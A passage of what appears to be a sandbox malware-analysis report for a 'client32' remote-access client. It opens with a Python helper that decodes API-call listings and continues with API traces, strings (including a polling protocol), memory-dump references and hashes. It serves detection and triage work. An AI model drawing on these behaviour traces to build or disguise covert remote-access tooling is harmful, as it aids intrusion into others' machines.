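• socket.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 6F9FAB4E
• #21.WSOCK32(00000000,00000006,00000001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6F9FABE3
• bind.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6F9FAC18
• GetTickCount.KERNEL32 ref: 6F9FAE6C
"""

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>#?\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX_RE = re.compile(r"-?[0-9A-Fa-f]{8}")   # the dump prints every value as 8 hex digits

# Exports the report shows only by ordinal. Assumption: the standard wsock32.dll
# export table, in which ordinal 21 is setsockopt.
ORDINALS = {"#21": "setsockopt"}

# Constant tables from the Winsock / WinInet headers.
AF = {2: "AF_INET", 23: "AF_INET6"}
SOCK_TYPE = {1: "SOCK_STREAM", 2: "SOCK_DGRAM"}
SOCKOPT = {(6, 1): "TCP_NODELAY", (0xFFFF, 0x8): "SO_KEEPALIVE",
           (0xFFFF, 0x80): "SO_LINGER", (0xFFFF, 0x1001): "SO_SNDBUF",
           (0xFFFF, 0x1002): "SO_RCVBUF"}
INET_SERVICE = {1: "INTERNET_SERVICE_FTP", 2: "INTERNET_SERVICE_GOPHER",
                3: "INTERNET_SERVICE_HTTP"}


@dataclass
class ApiCall:
    name: str
    module: str
    raw_args: List[str]
    args: List[Optional[int]]      # None where the dump shows '?' or a symbol
    ref: str
    subcall_of: Optional[str] = None


def parse_listing(text: str) -> List[ApiCall]:
    """Turn each listing line into an ApiCall; lines that are not calls are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = [t.strip() for t in m.group("args").split(",")] if m.group("args") else []
        ints = [int(t, 16) if HEX_RE.fullmatch(t) else None for t in raw]
        name = ORDINALS.get(m.group("name"), m.group("name"))
        calls.append(ApiCall(name, m.group("mod"), raw, ints, m.group("ref"), m.group("sub")))
    return calls


def decode(c: ApiCall) -> Optional[str]:
    """Render the parameters that matter for triage. Only the callee's own
    parameters are read; the trailing values are stale stack contents."""
    a = c.args
    if c.name == "socket" and len(a) >= 2 and None not in a[:2]:
        return f"socket({AF.get(a[0], hex(a[0]))}, {SOCK_TYPE.get(a[1], hex(a[1]))})"
    if c.name == "setsockopt" and len(a) >= 3 and None not in a[1:3]:
        label = SOCKOPT.get((a[1], a[2]), f"level={a[1]:#x} opt={a[2]:#x}")
        return f"setsockopt({label})"
    if c.name == "InternetConnectA" and len(a) >= 6 and None not in (a[2], a[5]):
        return f"InternetConnectA(port={a[2]}, {INET_SERVICE.get(a[5], hex(a[5]))})"
    if c.name == "GetProcAddress" and len(c.raw_args) >= 2:
        return f"GetProcAddress -> {c.raw_args[1]}"      # dynamically resolved import
    return None


def summarize(text: str) -> Dict[str, List[str]]:
    """Dynamic imports plus every call the decoder understands, in listing order."""
    calls = parse_listing(text)
    return {
        "dynamic_imports": [c.raw_args[1] for c in calls
                            if c.name == "GetProcAddress" and len(c.raw_args) > 1],
        "decoded": [d for d in (decode(c) for c in calls) if d],
    }


if __name__ == "__main__":
    for line in summarize(SAMPLE_APIS)["decoded"]:
        print(line)
```

Run on the sample, the summary names the two WinInet functions resolved at run time, an HTTP service connection on port 80, an AF_INET / SOCK_STREAM socket and TCP_NODELAY being set, which is the gateway-connection behaviour the API and string IDs above record. Adding rows to the constant tables is the only change needed to cover further calls in the same report.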

                                                                                   Control-flow Graph: function at 11139ed0 (graph image and its executed / not-executed block colouring are not reproduced in this text export)
                                                                                  APIs
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 11139F07
                                                                                  • IsWindow.USER32(0006040E), ref: 11139F65
                                                                                  • IsWindowVisible.USER32(0006040E), ref: 11139F73
                                                                                  • IsWindowVisible.USER32(0006040E), ref: 11139FAB
                                                                                  • GetForegroundWindow.USER32 ref: 11139FC6
                                                                                  • EnableWindow.USER32(0006040E,00000000), ref: 11139FE0
                                                                                  • EnableWindow.USER32(0006040E,00000001), ref: 11139FFC
                                                                                  • SetForegroundWindow.USER32(00000000), ref: 1113A00B
                                                                                  • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 1113A049
                                                                                  • IsWindowVisible.USER32(00000000), ref: 1113A058
                                                                                  • IsWindowVisible.USER32(0006040E), ref: 1113A088
                                                                                  • IsIconic.USER32(0006040E), ref: 1113A095
                                                                                  • GetForegroundWindow.USER32 ref: 1113A09F
                                                                                    • Part of subcall function 11132120: ShowWindow.USER32(0006040E,00000000,?,11139EA2,00000007,?,?,?,?,?,00000000), ref: 11132144
                                                                                    • Part of subcall function 11132120: ShowWindow.USER32(0006040E,11139EA2,?,11139EA2,00000007,?,?,?,?,?,00000000), ref: 11132156
                                                                                  • SetForegroundWindow.USER32(00000000), ref: 1113A0C5
                                                                                  • EnableWindow.USER32(0006040E,00000001), ref: 1113A0D4
                                                                                  • GetLastError.KERNEL32 ref: 1113A193
                                                                                  • GetLastError.KERNEL32 ref: 1113A20B
                                                                                  • GetTickCount.KERNEL32 ref: 1113A4B8
                                                                                  • GetTickCount.KERNEL32 ref: 1113A4D9
                                                                                    • Part of subcall function 110261A0: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,1113A522), ref: 110261A8
                                                                                  • FreeLibrary.KERNEL32(?,00000000,000000FF,00000000,00000001,00000000,00000001,00000000,0000000A,?,00000000), ref: 1113A574
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                   • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Window$ForegroundVisible$Enable$CountErrorLastLibraryShowTick$CurrentFindFreeIconicLoadThread
                                                                                  • String ID: Audio$Client$File <%s> doesnt exist, e=%d$HideWhenIdle$HookDirectSound$MainWnd = %08x, visible %d, valid %d$NeedsReinstall$Reactivate main window$Shell_TrayWnd$ShowNeedsReinstall in 15, user=%s$disableRunplugin
                                                                                  • API String ID: 2511061093-2542869446
                                                                                  • Opcode ID: d2c277f1efcbfe15d5673ed47da229280ab303ea4c79ec1b301778a1da1a73c4
                                                                                  • Instruction ID: 9ececd2581658abecd2b9d282a3ee437682ea2591524154b6e9732358788741a
                                                                                  • Opcode Fuzzy Hash: d2c277f1efcbfe15d5673ed47da229280ab303ea4c79ec1b301778a1da1a73c4
                                                                                  • Instruction Fuzzy Hash: FC023675E11226DFE716DFA4DD94BAAFB65BBC131EF140138E4219728CEB30A844CB91

                                                                                  Control-flow Graph
                                                                                  (rendered graph for the function at 11134830 is not available in text form; the executed / not-executed legend and the basic-block edge list are omitted here)
                                                                                  APIs
                                                                                    • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                  • GetLocalTime.KERNEL32(?,_debug,CheckLeaks,00000001,00000000,50D94AA1), ref: 1113489E
                                                                                  • LoadLibraryA.KERNEL32(psapi.dll), ref: 111348F6
                                                                                  • GetCurrentProcess.KERNEL32 ref: 11134937
                                                                                  • GetProcAddress.KERNEL32(?,GetProcessHandleCount), ref: 11134961
                                                                                  • GetProcessHandleCount.KERNEL32(00000000,?), ref: 11134972
                                                                                  • SetLastError.KERNEL32(00000078), ref: 11134978
                                                                                  • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11134994
                                                                                  • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 111349BC
                                                                                  • SetLastError.KERNEL32(00000078), ref: 111349D9
                                                                                  • SetLastError.KERNEL32(00000078), ref: 111349E6
                                                                                  • GetProcAddress.KERNEL32(?,GetProcessMemoryInfo), ref: 111349F8
                                                                                  • K32GetProcessMemoryInfo.KERNEL32(?,?,00000028), ref: 11134A0B
                                                                                  • SetLastError.KERNEL32(00000078), ref: 11134A11
                                                                                  • FreeLibrary.KERNEL32(?), ref: 11134B7B
                                                                                  • FreeLibrary.KERNEL32(?), ref: 11134B88
                                                                                  • FreeLibrary.KERNEL32(?), ref: 11134B92
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressErrorLastLibraryProc$FreeProcess$CountCurrentHandleInfoLoadLocalMemoryTime__wcstoi64
                                                                                  • String ID: CheckLeaks$Client$Date=%04d-%02d-%02d$GetGuiResources$GetProcessHandleCount$GetProcessMemoryInfo$RestartGdiObj$RestartHandles$RestartMB$RestartUserObj$Used handles=%d, gdiObj=%d, userObj=%d, mem=%u kB$_debug$psapi.dll
                                                                                  • API String ID: 263027137-1001504656
                                                                                  • Opcode ID: e9bc53f18f3aff5df15c67e08978246e2bd3215a060d2d5924f045e3fecf3fd3
                                                                                  • Instruction ID: db8711c19b503e7e72fae74a2cc3466c9a493194fb08fa6cc11ddefe45185306
                                                                                  • Opcode Fuzzy Hash: e9bc53f18f3aff5df15c67e08978246e2bd3215a060d2d5924f045e3fecf3fd3
                                                                                  • Instruction Fuzzy Hash: 27B1AE78E402699FDB10CFE9CD80BADFBB5EB88319F104429E419E7648DB749884CB55
                                                                                  APIs
                                                                                  • #16.WSOCK32(00000000,009686C7,6FA03361,00000000,00000000,6FA03361,00000007), ref: 6F9F924C
                                                                                  • WSAGetLastError.WSOCK32(00000000,009686C7,6FA03361,00000000,00000000,6FA03361,00000007), ref: 6F9F925B
                                                                                  • GetTickCount.KERNEL32 ref: 6F9F9274
                                                                                  • Sleep.KERNEL32(00000001,00000000,009686C7,6FA03361,00000000,00000000,6FA03361,00000007), ref: 6F9F92A8
                                                                                  • GetTickCount.KERNEL32 ref: 6F9F92B0
                                                                                  • Sleep.KERNEL32(00000014), ref: 6F9F92BC
                                                                                  Strings
                                                                                  • ReadSocket - Connection has been closed by peer, xrefs: 6F9F92E0
                                                                                  • hbuf->buflen - hbuf->datalen >= min_bytes_to_read, xrefs: 6F9F922B
                                                                                  • ReadSocket - Error %d reading response, xrefs: 6F9F92F7
                                                                                  • e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 6F9F9226
                                                                                  • *RecvTimeout, xrefs: 6F9F927B
                                                                                  • ReadSocket - Would block, xrefs: 6F9F928A
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3455109046.000000006F9F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455268968.000000006FA30000.00000002.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455302973.000000006FA39000.00000008.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3A000.00000004.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455462215.000000006FA40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CountSleepTick$ErrorLast
                                                                                  • String ID: *RecvTimeout$ReadSocket - Connection has been closed by peer$ReadSocket - Error %d reading response$ReadSocket - Would block$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$hbuf->buflen - hbuf->datalen >= min_bytes_to_read
                                                                                  • API String ID: 2495545493-2497412063
                                                                                  • Opcode ID: 2c5d4752eec53ca5ca4f00d9634927b280cd5aa6bee6b4bc10b177138af5680e
                                                                                  • Instruction ID: 551105c8fbbfb559280de8bec8737c09a48bf41777ec097c5af27c04d67ecba6
                                                                                  • Opcode Fuzzy Hash: 2c5d4752eec53ca5ca4f00d9634927b280cd5aa6bee6b4bc10b177138af5680e
                                                                                  • Instruction Fuzzy Hash: 3731B136E01208AFEB10DFB8DD85B9E77B8AB45324F008559E908D71C5E735E9528B91
                                                                                  APIs
                                                                                  • GetSystemTime.KERNEL32(?,?,?,905C354D,7412D4F6,905C34B3,FFFFFFFF,00000000), ref: 6FA031E2
                                                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,6FA2ECB0), ref: 6FA031EC
                                                                                  • GetSystemTime.KERNEL32(?,7412D4F6,905C34B3,FFFFFFFF,00000000), ref: 6FA0322A
                                                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,6FA2ECB0), ref: 6FA03234
                                                                                  • EnterCriticalSection.KERNEL32(6FA3B898,?,905C354D), ref: 6FA032BE
                                                                                  • LeaveCriticalSection.KERNEL32(6FA3B898,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000), ref: 6FA032D3
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6FA0334D
                                                                                    • Part of subcall function 6FA0BA20: __strdup.LIBCMT ref: 6FA0BA3A
                                                                                    • Part of subcall function 6FA0BB00: _free.LIBCMT ref: 6FA0BB2D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3455109046.000000006F9F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455268968.000000006FA30000.00000002.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455302973.000000006FA39000.00000008.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3A000.00000004.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                  • Associated: 0000000B.00000002.3455462215.000000006FA40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Time$System$CriticalFileSection$CurrentEnterLeaveThread__strdup_free
                                                                                  • String ID: 1.1$ACK=1$CMD=POLL$INFO=1
                                                                                  • API String ID: 1510130979-3441452530
                                                                                  • Opcode ID: d37af2e3a7d19b0a301ff5e9b27aa78d2f8d97b3c36ccef1bb9accb288967d7c
                                                                                  • Instruction ID: 4efbd9f74453399cfb9cde31946a6865ef8d72335a335faf6eb92cd89804485a
                                                                                  • Opcode Fuzzy Hash: d37af2e3a7d19b0a301ff5e9b27aa78d2f8d97b3c36ccef1bb9accb288967d7c
                                                                                  • Instruction Fuzzy Hash: 59616672D00719AFCB14EFA4ED81EEEB7B5FF49318F048519E416A7280DB38A544CB61
                                                                                  APIs
                                                                                  • GetVersionExA.KERNEL32(111F1EF0,76938400), ref: 11145CA0
                                                                                  • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                  • _memset.LIBCMT ref: 11145CFD
                                                                                    • Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,76938400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
                                                                                  • _strncpy.LIBCMT ref: 11145DCA
                                                                                    • Part of subcall function 111648ED: __isdigit_l.LIBCMT ref: 11164912
                                                                                  • RegCloseKey.KERNEL32(00000000), ref: 11145E66
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseOpenQueryValueVersion__isdigit_l_memset_strncpy
                                                                                  • String ID: CSDVersion$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
                                                                                  • API String ID: 3299820421-2117887902
                                                                                  • Opcode ID: 929fb5d8b7f52e0b88e664298c84f703fc5a1542ba09115f26204fab96234c05
                                                                                  • Instruction ID: 72e9b589e9c81c7730d33f5d85faf9c496c6ad46d8e7039c924549f2bc0033ac
                                                                                  • Opcode Fuzzy Hash: 929fb5d8b7f52e0b88e664298c84f703fc5a1542ba09115f26204fab96234c05
                                                                                  • Instruction Fuzzy Hash: A4510871E0023BABDB21CF61CD41FDEF7B9AB01B0CF1040A9E91D66945E7B16A49CB91
                                                                                  APIs
                                                                                  • CoInitialize.OLE32(00000000), ref: 111168D5
                                                                                  • CoCreateInstance.OLE32(111C1AAC,00000000,00000001,111C1ABC,00000000,?,00000000,Client,silent,00000000,00000000,?,1104C49F), ref: 111168EF
                                                                                  • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000000,Client,silent,00000000,00000000), ref: 11116914
                                                                                  • GetProcAddress.KERNEL32(00000000,SHGetSettings), ref: 11116926
                                                                                  • SHGetSettings.SHELL32(?,00000200,?,00000000,Client,silent,00000000,00000000), ref: 11116939
                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,Client,silent,00000000,00000000), ref: 11116945
                                                                                  • CoUninitialize.COMBASE(00000000), ref: 111169E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Library$AddressCreateFreeInitializeInstanceLoadProcSettingsUninitialize
                                                                                  • String ID: SHELL32.DLL$SHGetSettings
                                                                                  • API String ID: 4195908086-2348320231
                                                                                  • Opcode ID: 7f4dfa4f84449ddd9057b5d12e5b7092daec7eaad03784577530b65d584c16e3
                                                                                  • Instruction ID: 86b6e15c13bd198e2be1b4906c6dc8e983a2f790f9ea6f3073e45f268e972f68
                                                                                  • Opcode Fuzzy Hash: 7f4dfa4f84449ddd9057b5d12e5b7092daec7eaad03784577530b65d584c16e3
                                                                                  • Instruction Fuzzy Hash: 81515175A00219AFDB00DFA5C9C0EAFFBB9EF48304F114969E915AB244E771A941CB61
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _memset
                                                                                  • String ID: NBCTL32.DLL$_License$serial_no
                                                                                  • API String ID: 2102423945-35127696
                                                                                  • Opcode ID: 19c1bfdd6460f6a249e12eea9a2a20caa138c9ba89d8b6a2a5b87a7590f55589
                                                                                  • Instruction ID: b632ae2d06a9e035363f4f75e6ccaf6c516ded967162c2d69bbdd490d26a7599
                                                                                  • Opcode Fuzzy Hash: 19c1bfdd6460f6a249e12eea9a2a20caa138c9ba89d8b6a2a5b87a7590f55589
                                                                                  • Instruction Fuzzy Hash: A8B18075E04209ABE714CF98DC81FEEB7F5FF88304F158169E9499B285DB71A901CB90
                                                                                  APIs
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(1102EA50,?,00000000), ref: 110317A4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                  • String ID: Client32$NSMWClass$NSMWClass
                                                                                  • API String ID: 3192549508-611217420
                                                                                  • Opcode ID: 0b0c06552eb5d8578d5f8a1ba1b3e93930f4d748b8e68e94dbd9e084aab78c4a
                                                                                  • Instruction ID: 804cb5d527221f69a992b866d17bc63a828f9d1c02720c4f1a032ef46c9a5584
                                                                                  • Opcode Fuzzy Hash: 0b0c06552eb5d8578d5f8a1ba1b3e93930f4d748b8e68e94dbd9e084aab78c4a
                                                                                  • Instruction Fuzzy Hash: C1F04F7890222ADFC30ADF95C995A59B7F4BB8870CB108574D43547208EB3179048B99
                                                                                  APIs
                                                                                  • GetTokenInformation.KERNELBASE(00000000,00000001(TokenUser),00000000,00000000,?,11030346,?,00000000), ref: 1109ED68
                                                                                  • GetTokenInformation.KERNELBASE(00000000,00000001(TokenUser),?,00000001,00000001), ref: 1109ED84
                                                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,0094CB48,0094CB48,0094CB48,0094CB48,0094CB48,0094CB48,0094CB48,111EFB64,?,00000001,00000001), ref: 1109EDB0
                                                                                  • EqualSid.ADVAPI32(?,0094CB48,?,00000001,00000001), ref: 1109EDC3
                                                                                  Memory Dump Source
